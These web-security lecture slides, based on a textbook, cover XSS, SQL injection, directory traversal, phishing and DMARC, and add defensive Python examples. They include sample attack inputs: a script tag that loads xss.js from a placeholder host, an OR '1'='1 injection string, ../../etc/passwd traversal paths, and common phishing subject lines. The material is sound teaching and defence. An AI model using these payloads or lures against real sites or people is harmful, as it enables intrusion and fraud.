Web Security - Slides

1

SECURITY IN
COMPUTING,
FIFTH EDITION
Web-security
2

Browser Vulnerabilities

From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.
3

Browser Attack Types


• Man-in-the-browser
• Keystroke logger
• Page-in-the-middle
• Program download substitution
• User-in-the-middle

4

Man-in-the-Browser
5

Keystroke Logger
• Hardware or software that records all
keystrokes
• May be a small dongle plugged into a USB
port or can masquerade as a keyboard
• May also be installed as malware
• Not limited to browsers

6

Page-in-the-Middle
• User is directed to a different page than
believed or intended
• Similar effect to a man-in-the-browser,
where attacker can intercept and modify
user input

7

Program Download Substitution


• Attacker creates a page with seemingly
innocuous and desirable programs for download
• Instead of, or in addition to, the intended
functionality, the user installs malware
• This is a very common technique for spyware

8

User-in-the-Middle
• Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf

9

Successful Authentication
• The attacks listed above are largely failures of
authentication
• Can be mitigated with
• Shared secret
• One-time password
• Out-of-band communication
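
The slide names a shared secret and a one-time password as mitigations. The following added example (not from the textbook) shows how the two fit together: an HMAC-based one-time password per RFC 4226, where client and server hold the same secret and the server keeps a counter so that a captured code cannot be replayed. The secret value and the look-ahead window size are constructed for the example.

```python
import hashlib
import hmac
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226).

    HMAC-SHA1 is computed over the 8-byte big-endian counter, a 31-bit
    value is extracted at the offset given by the low nibble of the last
    byte ("dynamic truncation"), and the result is reduced mod 10^digits.
    """
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (
        (mac[offset] & 0x7F) << 24
        | mac[offset + 1] << 16
        | mac[offset + 2] << 8
        | mac[offset + 3]
    )
    return str(code % (10 ** digits)).zfill(digits)


class OtpVerifier:
    """Server side of the exchange.

    Holds the shared secret and the next expected counter. A submitted code
    is accepted only once (the counter moves past it) and only within a small
    look-ahead window, so a keylogged or intercepted code is useless after use.
    """

    def __init__(self, secret: bytes, window: int = 3):
        self.secret = secret
        self.counter = 0          # next counter value we expect the client to use
        self.window = window      # how far ahead we tolerate the client drifting

    def verify(self, submitted: str) -> bool:
        for c in range(self.counter, self.counter + self.window):
            # compare_digest avoids leaking which digits matched via timing
            if hmac.compare_digest(hotp(self.secret, c), submitted):
                self.counter = c + 1   # resynchronise and burn this code
                return True
        return False


if __name__ == "__main__":
    # Constructed demo: the RFC 4226 test secret
    secret = b"12345678901234567890"
    server = OtpVerifier(secret)
    first = hotp(secret, 0)
    print("client code:", first)
    print("accepted:", server.verify(first))
    print("replay accepted:", server.verify(first))   # expected False
```

The `compare_digest` call and the "burn after use" counter update are the two details that make this a one-time password rather than a static shared secret; a man-in-the-browser that captures the code still cannot reuse it.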

10

Fake Website

11

Fake Code

12

Tracking Bug

13

Clickjacking

14

Drive-By Download
• Code is downloaded, installed, and executed on a
computer without the user’s knowledge
• May be the result of clickjacking, fake code, program
download substitution, etc.

15

Cross-Site Scripting (XSS)


• Tricking a client or server into executing scripted code by
including the code in data inputs
• Scripts and HTML tags are encoded as plaintext just like
user inputs, so they can take over web pages similarly to
the way buffer overflow attacks can take over programs

Cool<br>story.<br>KCTVBigFan<script
src=http://badsite.com/xss.js></script>
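
To show what the slide's comment does to a page, and the countermeasure, here is an added example (not code from the textbook): the same comment is rendered once by pasting it into the HTML and once after HTML-encoding it. The page template and the check function are constructed for the example; the comment string is the slide's own.

```python
import html

# The slide's sample comment; badsite.com is the slide's placeholder, not a real target
MALICIOUS_COMMENT = (
    "Cool<br>story.<br>KCTVBigFan<script src=http://badsite.com/xss.js></script>"
)

# Constructed page template that shows a user comment
PAGE_TEMPLATE = (
    "<html><body><h1>Comments</h1>"
    "<div class='comment'>{body}</div>"
    "</body></html>"
)


def render_unsafe(comment: str) -> str:
    """Vulnerable: the user's text becomes part of the page's markup,
    so the <script> tag is real and the browser fetches and runs xss.js."""
    return PAGE_TEMPLATE.format(body=comment)


def render_safe(comment: str) -> str:
    """Hardened: every markup-significant character is encoded, so the
    browser displays the literal text '<script ...>' and executes nothing."""
    return PAGE_TEMPLATE.format(body=html.escape(comment, quote=True))


def contains_live_script(page: str) -> bool:
    """Illustrative check: does the rendered markup contain a real <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe page executes script:", contains_live_script(render_unsafe(MALICIOUS_COMMENT)))
    print("safe page executes script:  ", contains_live_script(render_safe(MALICIOUS_COMMENT)))
    print(render_safe(MALICIOUS_COMMENT))
```

Encoding also turns the harmless `<br>` tags into visible text; a site that wants to allow a small set of tags needs an allow-list sanitiser rather than a blanket escape, which is exactly the "account for every encoding" problem the countermeasures slide raises.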

16

SQL Injection
• Injecting SQL code into an exchange between an
application and its database server
• Example:
• Loading an SQL query into a variable, taking the value of acctNum
from an arbitrary user input field:
• QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + "'; "
• The same query with malicious user input:
• QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "
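
The two queries above, run for real against an in-memory SQLite table, as an added example that is not part of the slides. The table contents are constructed; the column and table names follow the slide. The vulnerable function is the slide's string concatenation; the hardened one sends `acctNum` as a bound parameter so the database never parses it as SQL.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample 'trans' table: two rows for account 2468, two others."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE trans (id INTEGER PRIMARY KEY, acct TEXT, amount REAL)")
    conn.executemany(
        "INSERT INTO trans (acct, amount) VALUES (?, ?)",
        [("1357", 10.0), ("2468", 20.0), ("2468", 5.5), ("9999", 100.0)],
    )
    conn.commit()
    return conn


def query_vulnerable(conn: sqlite3.Connection, acct_num: str) -> list:
    """The slide's pattern: the user's value is spliced into the SQL text,
    so a value containing quotes rewrites the WHERE clause."""
    query = "SELECT * FROM trans WHERE acct = '" + acct_num + "';"
    return conn.execute(query).fetchall()


def query_parameterized(conn: sqlite3.Connection, acct_num: str) -> list:
    """Hardened: the SQL text is fixed; the value travels separately as a
    parameter and is compared as data, quotes and all."""
    return conn.execute("SELECT * FROM trans WHERE acct = ?;", (acct_num,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    honest = "2468"
    hostile = "2468' OR '1'='1"          # the slide's malicious input
    print("honest, vulnerable:  ", len(query_vulnerable(db, honest)), "rows")
    print("honest, parameterized:", len(query_parameterized(db, honest)), "rows")
    print("hostile, vulnerable:  ", len(query_vulnerable(db, hostile)), "rows")   # whole table
    print("hostile, parameterized:", len(query_parameterized(db, hostile)), "rows")  # none
```

The parameterized version returns zero rows for the hostile input because no account is literally named `2468' OR '1'='1`; that is the behaviour to look for when reviewing data-access code, and the same property is what stored procedures with typed arguments give you on the server side.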

17

Dot-Dot-Slash
• Also known as “directory traversal,” this is when attackers
use the term “../” to access files that are on the target web
server but not meant to be accessed from outside
• Most commonly entered into the URL bar but may also be
combined with other attacks, such as XSS

18

Server-Side Include (SSI)


• SSI is an interpreted server-side scripting language that
can be used for basic web server directives, such as
including files and executing commands
• As is the case with XSS, some websites are vulnerable to
allowing users to execute SSI directives through text input

19

Countermeasures to Injections
• Filter and sanitize all user input
• Need to account for every potentially valid encoding
• Make no assumptions about the range of possible user
inputs—trust nothing, check everything
• Use access control mechanisms on backend servers,
such as “stored procedures”
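
The dot-dot-slash slide and the countermeasures slide fit together in one piece of code: a path resolver that decodes every layer of percent-encoding before it looks for `../`, then checks that the final path still lies under the document root. This is an added example, not code from the textbook; the document root and the sample requests are constructed.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for this example
BASE_DIR = "/var/www/site/public"


def fully_decode(text: str, max_rounds: int = 5) -> str:
    """Undo percent-encoding until the text stops changing.

    A filter that decodes only once misses double-encoded input such as
    %252e%252e%252f, which becomes %2e%2e%2f after one pass and '../'
    only after the second.
    """
    current = text
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            return current
        current = decoded
    raise ValueError("too many layers of encoding")


def resolve_request_path(user_path: str, base_dir: str = BASE_DIR) -> str:
    """Map a requested URL path to a file under base_dir.

    Raises ValueError when the request would escape the document root.
    """
    decoded = fully_decode(user_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Treat backslashes as separators so 'dir\\..\\file' is normalised as well
    decoded = decoded.replace("\\", "/")
    # Collapse './' and '../' segments; anything that still begins with '..'
    # after normalisation is trying to climb above the root
    relative = posixpath.normpath(decoded.lstrip("/"))
    if relative == ".." or relative.startswith("../"):
        raise ValueError("path escapes document root")
    candidate = posixpath.normpath(posixpath.join(base_dir, relative))
    # Final check on the resolved path itself, independent of the string tests above
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        raise ValueError("path escapes document root")
    return candidate


def is_safe_request(user_path: str) -> bool:
    """True if the request resolves to something inside the document root."""
    try:
        resolve_request_path(user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for req in ["images/logo.png", "images/../about.html",
                "../../etc/passwd", "..%2F..%2Fetc%2Fpasswd",
                "%252e%252e%252fetc/passwd", "docs\\..\\..\\secret.txt"]:
        print(f"{req!r:35} -> {'allow' if is_safe_request(req) else 'reject'}")
```

The decision is made on the normalised, fully decoded path rather than by searching the raw request for the string `../`, which is the "trust nothing, check everything" rule from the slide applied to one input.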

20

Email Spam
• Experts estimate that 60% to 90% of all email is spam
• Types of spam:
• Advertising
• Pharmaceuticals
• Stocks
• Malicious code
• Links for malicious websites
• Spam countermeasures
• Laws against spam exist but are generally ineffective
• Email filters have become very effective for most spam
• Internet service providers use volume limitations to make
spammers’ jobs more difficult

Phishing
• Phishing – Cybercriminal attempts to steal personal and financial information or infect
computers and other devices with malware and viruses
• Designed to trick you into clicking a link or providing personal or financial information
• Often in the form of emails and websites
• May appear to come from legitimate companies, organizations or known individuals
• Take advantage of natural disasters, epidemics, health scares, political elections or timely
events

Different forms such as:

• Mass Phishing – Mass, large-volume attack intended to reach as many people as possible
• Whaling – Type of spear phishing attack that targets “big fish,” including high-profile
individuals or those with a great deal of authority or access
• Clone Phishing – Spoofed copy of a legitimate and previously delivered email, with
original attachments or hyperlinks replaced with malicious versions, which is sent from a
forged email address so it appears to come from the original sender or another legitimate
source
• Advance-Fee Scam: Requests the target to send money or bank account information to
the cybercriminal
• And Spear Phishing…..
Spear Phishing
• Spear phishing is on the rise because it works. Traditional security defences do not detect and stop it.

• From a cyber criminal’s point of view, spear phishing is the perfect vehicle for a broad array of damaging
exploits.

• Threat actors are increasingly targeting executives and other high-level employees, tricking them into
activating malware that gives criminals access into their companies’ environments.

• This might be ransomware that encrypts company data, then extorts fees from the victim to remediate
the situation. Targeted executives are usually key leaders with titles such as chief financial officer, head
of finance, senior vice president and director.

• Spear phishing emails tend to have enough detail to fool even experienced security professionals.

• A phishing campaign may blanket an entire database of email addresses, but spear phishing targets
specific individuals within specific organizations with a specific mission.

• By mining social networks for personal information, an attacker can write emails that are extremely
accurate and compelling.

• Once the target clicks on a link or opens an attachment, the attacker establishes a foothold in the
network, enabling them to complete their illicit mission.

• 84% of organizations said a spear-phishing attack successfully penetrated their organization in 2015
Common Baiting Tactics

• Notification from a help desk or system administrator
  Asks you to take action to resolve an issue with your account (e.g., email account has reached its storage limit), which often includes clicking on a link and providing requested information.

• Advertisement for immediate weight loss, hair growth or fitness prowess
  Serves as a ploy to get you to click on a link that will infect your computer or mobile device with malware or viruses.

• Attachment labeled “invoice” or “shipping order”
  Contains malware that can infect your computer or mobile device if opened. May contain what is known as “ransomware,” a type of malware that will delete all files unless you pay a specified sum of money.

• Notification from what appears to be a credit card company
  Indicates someone has made an unauthorized transaction on your account. If you click the link to log in to verify the transaction, your username and password are collected by the scammer.

• Fake account on a social media site
  Mimics a legitimate person, business or organization. May also appear in the form of an online game, quiz or survey designed to collect information from your account.
Phishing Lure
• Often makes it look like a problem with one of your accounts
• Or it tries to take advantage of an ongoing humanitarian crisis
Can you detect a phishing scam?
Common phishing scam Subject Lines
Barracuda Networks researchers compiled a list of the top 12 most
common subject lines used in phishing emails targeting businesses.
Researchers analyzed over 360,000 phishing emails & found the most
common subject line used in attacks is simply ‘Request’ – accounting for
over a third of all the phishing messages analyzed.

The report found the top 12 subject lines were as follows:


1. Request
2. Follow up
3. Urgent/Important
4. Are you available?/Are you at your desk?
5. Payment Status
6. Hello
7. Purchase
8. Invoice Due
9. Re:
10. Direct Deposit
11. Expenses
12. Payroll
Spear Phishing Characteristics
A spear-phishing attack can display one or more of the following characteristics:

• Blended or multi-vector threat. Spear phishing uses a blend of email spoofing, dynamic URLs and drive-by downloads to bypass traditional defenses.

• Use of zero-day vulnerabilities. Advanced spear-phishing attacks leverage zero-day vulnerabilities in browsers, plug-ins and desktop applications to compromise systems.

• Multi-stage attack. The initial exploit of systems is the first stage of an APT attack that involves further stages of malware outbound communications, binary downloads and data exfiltration.

• Well-crafted email forgeries. Spear phishing email threats are usually targeted to individuals, so they don’t bear much resemblance to the high-volume, broadcast spam that floods the Internet. This means traditional reputation and spam filters routinely miss these messages, rendering traditional email protections ineffective.
How to protect against phishing
• STOP. THINK. CONNECT.
• Before you click, look for common baiting tactics, e.g. requests for personal information, announcements that you have won a prize or lottery, or requests for donations
  • Look for spelling errors (e.g., “pessward”), lack of punctuation or poor grammar
  • Hyperlinked URL differs from the one displayed, or it is hidden
  • Threatening language that calls for immediate action

• Install and maintain antivirus software on your electronic devices

• Use email filters to reduce spam and malicious traffic

• Be wary of messages asking for passwords or other personal information
  • Reputable businesses and organizations will never ask for your password via email
  • Never send passwords, bank account numbers or other private information in an email
  • Do not reply to requests for this information
  • Verify by contacting the company or individual, but do not use the contact information included in the message

• Do not click on any hyperlinks in the email
  • Use your mouse to hover over each link to verify its actual destination, even if the message appears to be from a trusted source
  • Pay attention to the URL and look for a variation in spelling or a different domain (e.g., ulster.ac vs. ulster.com)
  • Consider navigating to familiar sites on your own instead of using links within messages

• Examine websites closely
  • Malicious websites may look identical to legitimate sites
  • Look for “https://” or a lock icon in the address bar before entering any sensitive information on a website
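
Two of the checks above (the hyperlinked URL differing from the displayed one, and a lookalike domain such as ulster.ac vs. ulster.com) can be automated for an HTML message. The following is an added example, not code from the slides: it extracts every link from a message body, compares the visible text with the real target, and flags targets that share a first label with a domain you trust but are not that domain. The sample message and the trusted-domain list are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url_or_text: str) -> str:
    """Hostname of a URL, or of bare text such as 'ulster.ac/login'."""
    s = url_or_text.strip()
    if "://" not in s:
        s = "http://" + s
    return (urlparse(s).hostname or "").lower()


def looks_like_url(text: str) -> bool:
    """Crude test for display text that a reader would read as an address."""
    return "." in text and " " not in text


def find_suspicious_links(html_text: str, trusted_hosts) -> list:
    """Return (href, reason) pairs for links a reader should not click.

    Check 1: the displayed text names one host but the link goes elsewhere.
    Check 2: the target is not a trusted host but shares its first label
             with one (the slide's ulster.ac vs ulster.com case).
    """
    collector = _AnchorCollector()
    collector.feed(html_text)
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for href, text in collector.links:
        target = host_of(href)
        if looks_like_url(text) and host_of(text) != target:
            findings.append((href, f"displayed '{text}' but links to {target}"))
        elif target not in trusted and any(
            target.split(".")[0] == t.split(".")[0] for t in trusted
        ):
            findings.append((href, f"lookalike of a trusted domain: {target}"))
    return findings


# Constructed sample message body (not a real email)
SAMPLE_EMAIL = """
<p>Your account will be suspended. Log in now to verify your details.</p>
<a href="http://ulster.com/login">http://ulster.ac/login</a><br>
<a href="http://ulster.com/verify">Verify now</a><br>
<a href="http://ulster.ac/help">Help centre</a>
"""

if __name__ == "__main__":
    for href, reason in find_suspicious_links(SAMPLE_EMAIL, {"ulster.ac"}):
        print(f"{href}: {reason}")
```

The first link trips the display-versus-target check, the second trips the lookalike check, and the third is left alone because it really goes to the trusted host; the output is what a reader would see by hovering, produced for every link at once.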
Best Practice for companies - DMARC
• Organisations should set up DMARC (Domain-based Message Authentication, Reporting and Conformance), an email standard that:
  1. confirms the sender’s identity using Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM)
  2. tells the recipient’s email service what to do with emails that fail the check
  3. asks recipient email services to provide reports of where email comes from

The benefits of DMARC are:

• Protecting your users, employees and reputation from cybercrime
• Reducing customer support costs relating to email fraud
• Improving trust in the emails your organisation sends
• Seeing the legitimate and fraudulent use of your domains via DMARC
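
The three things the slide says DMARC does can be traced through a small evaluator, added here as an example and not taken from the slides: parse the domain's DMARC record, check whether the SPF or DKIM result is aligned with the `From:` domain, and if neither is, apply the record's `p=` policy and note where reports go. The record and the message results are constructed; the organisational-domain rule is simplified to "last two labels" (real evaluators use the Public Suffix List), which is an assumption of this example.

```python
def parse_dmarc(record: str) -> dict:
    """Split a DMARC TXT record ('v=DMARC1; p=reject; ...') into tag/value pairs."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a usable DMARC record")
    return tags


def org_domain(domain: str) -> str:
    """Organisational domain, simplified (assumption) to the last two labels."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(header_from: str, authenticated: str, mode: str) -> bool:
    """Relaxed mode ('r') accepts any subdomain of the same organisation;
    strict mode ('s') requires an exact match with the From: domain."""
    if mode == "s":
        return header_from.lower() == authenticated.lower()
    return org_domain(header_from) == org_domain(authenticated)


def evaluate_dmarc(record: str, header_from: str,
                   spf_result: str, spf_domain: str,
                   dkim_result: str, dkim_domain: str) -> dict:
    """Step 1: identity via aligned SPF or DKIM. Step 2: disposition from p=.
    Step 3: where the receiver should send aggregate reports (rua=)."""
    tags = parse_dmarc(record)
    spf_ok = spf_result == "pass" and aligned(header_from, spf_domain, tags.get("aspf", "r"))
    dkim_ok = dkim_result == "pass" and aligned(header_from, dkim_domain, tags.get("adkim", "r"))
    passed = spf_ok or dkim_ok
    return {
        "result": "pass" if passed else "fail",
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        "disposition": "none" if passed else tags["p"],
        "report_to": tags.get("rua"),
    }


# Constructed sample record for the reserved domain example.com
SAMPLE_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; adkim=s; aspf=r"

if __name__ == "__main__":
    # Genuine mail: SPF passes for a subdomain (relaxed alignment is enough)
    print(evaluate_dmarc(SAMPLE_RECORD, "example.com", "pass", "mail.example.com", "pass", "example.com"))
    # Spoofed From: header: SPF passes only for the attacker's own sending domain
    print(evaluate_dmarc(SAMPLE_RECORD, "example.com", "pass", "attacker.example", "none", ""))
```

The spoofed message fails even though SPF "passed", because the pass belongs to a domain that is not aligned with the visible `From:`; that alignment requirement is what makes DMARC more than SPF and DKIM on their own, and `p=reject` is what turns the failure into a dropped message rather than a delivered one.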
Multi layered approach
